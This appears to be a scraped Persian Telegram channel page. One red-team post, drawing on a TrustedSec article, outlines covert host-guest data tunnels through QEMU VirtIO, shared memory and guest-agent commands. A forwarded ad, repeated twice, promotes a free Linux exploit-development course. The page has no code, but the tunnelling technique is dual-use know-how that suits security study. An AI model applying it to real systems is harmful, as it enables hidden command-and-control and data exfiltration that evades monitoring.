مهاجم با سوءاستفاده از VirtIO queues، Shared memory یا I/O emulation hooks دادههایی رو منتقل میکند که در سطح Network stack قابل تشخیص نیستند. این تکنیک میتواند از QEMU های Patch شده یا حتی از قابلیتهای Native مثل Virtio-serial برای ارسال داده بین Host و Guest استفاده کند.
به طوری که QEMU بهعنوان یک Hypervisor اجازهی انتقال داده بین Host و Guest رو از طریق Shared memory, Virtio devices یا Custom I/O Handlers میدهد. این مسیرها میتوانند بدون اینکه بستهای در شبکه واقعی رد و بدل بشود، اطلاعات حمل کنند.
و از Chardev, -Device virtserialport برای ساخت یک Pipe-like interface بین Host و Guest استفاده میشود. که امکان ایجاد Shell خود از طریق این interface روی Guest قرار دهد و روی Host listener بنویسد که دادهها رو پردازش کند.
و البته QEMU دارای دستورات داخلی مانند QEMU-ga، Guest-set-time, Guest-exec هست که برای مدیریت VM طراحی شدن، ولی میتواند بهعنوان ابزار انتقال داده پنهان استفاده شود.
#RedTeam #C2 #Exfiltration
@securation
TrustedSec
Hiding in the Shadows: Covert Tunnels via QEMU Virtualization
🔥1
Forwarded from OS Internals (Abolfazl Kazemi)
🔍 قابل توجه علاقهمندان به امنیت سیستمعامل و توسعه اکسپلویت در لینوکس
من همیشه به تدریس علاقهمند بودهام؛ نه صرفاً آموزش تئوری، بلکه انتقال واقعی تجربهها و درک عمیق مفاهیم فنی. از سالها پیش، تمرکزم روی internal سیستمعاملها—بهویژه ویندوز و لینوکس—و مباحث امنیتی بوده و سعی کردهام این مطالب تخصصی را به زبانی ساده، کاربردی و قابلفهم برای دیگران ارائه دهم.
🎓 حالا نوبت یک قدم جدید و متفاوت رسیده:
«دورهی Exploit Development در لینوکس»
از تحلیل آسیبپذیری واقعی گرفته تا نوشتن اکسپلویتهای عملی و کاربردی.
اما تصمیم گرفتم یک شرط خاص برای انتشار این دوره بگذارم:
🎯 اگر اعضای کانالم به ۵۰۰۰ نفر برسند، دوره را به صورت کامل و رایگان منتشر میکنم.
بیش از ۲۰ ساعت ویدئو و تمرین عملی بدون تبلیغات، بدون پرداخت هزینه—صرفاً برای اینکه دانش تخصصی، راحتتر و بیواسطه به دست کسانی برسه که واقعاً به یادگیری اهمیت میدن.
🧠 اگر شما هم به این مسیر علاقهمندید یا فکر میکنید افراد دیگری در اطرافتان هستند که این محتوا به دردشان میخورد، خوشحال میشم با معرفی کانالم به دوستانتان از این پروژه حمایت کنید.
📎 لینک کانال:
https://news.1rj.ru/str/OxAA55
✍️راستی سرفصل دوره رو هم میتونید در لینک زیر مشاهده کنید:
https://news.1rj.ru/str/OxAA55/140
من همیشه به تدریس علاقهمند بودهام؛ نه صرفاً آموزش تئوری، بلکه انتقال واقعی تجربهها و درک عمیق مفاهیم فنی. از سالها پیش، تمرکزم روی internal سیستمعاملها—بهویژه ویندوز و لینوکس—و مباحث امنیتی بوده و سعی کردهام این مطالب تخصصی را به زبانی ساده، کاربردی و قابلفهم برای دیگران ارائه دهم.
🎓 حالا نوبت یک قدم جدید و متفاوت رسیده:
«دورهی Exploit Development در لینوکس»
از تحلیل آسیبپذیری واقعی گرفته تا نوشتن اکسپلویتهای عملی و کاربردی.
اما تصمیم گرفتم یک شرط خاص برای انتشار این دوره بگذارم:
🎯 اگر اعضای کانالم به ۵۰۰۰ نفر برسند، دوره را به صورت کامل و رایگان منتشر میکنم.
بیش از ۲۰ ساعت ویدئو و تمرین عملی بدون تبلیغات، بدون پرداخت هزینه—صرفاً برای اینکه دانش تخصصی، راحتتر و بیواسطه به دست کسانی برسه که واقعاً به یادگیری اهمیت میدن.
🧠 اگر شما هم به این مسیر علاقهمندید یا فکر میکنید افراد دیگری در اطرافتان هستند که این محتوا به دردشان میخورد، خوشحال میشم با معرفی کانالم به دوستانتان از این پروژه حمایت کنید.
📎 لینک کانال:
https://news.1rj.ru/str/OxAA55
✍️راستی سرفصل دوره رو هم میتونید در لینک زیر مشاهده کنید:
https://news.1rj.ru/str/OxAA55/140
Telegram
OS Internals
مقاله و فیلم آموزش مدیریت و برنامهنویسی سیستمهای عامل، شبکه و امنیت اطلاعات.
مقالات من در ویرگول:
https://virgool.io/@akazemi
ویدئوهای کانال در آپارات:
https://www.aparat.com/oxaa55
ارتباط با مدیر کانال از طریق:
@akazemi67
مقالات من در ویرگول:
https://virgool.io/@akazemi
ویدئوهای کانال در آپارات:
https://www.aparat.com/oxaa55
ارتباط با مدیر کانال از طریق:
@akazemi67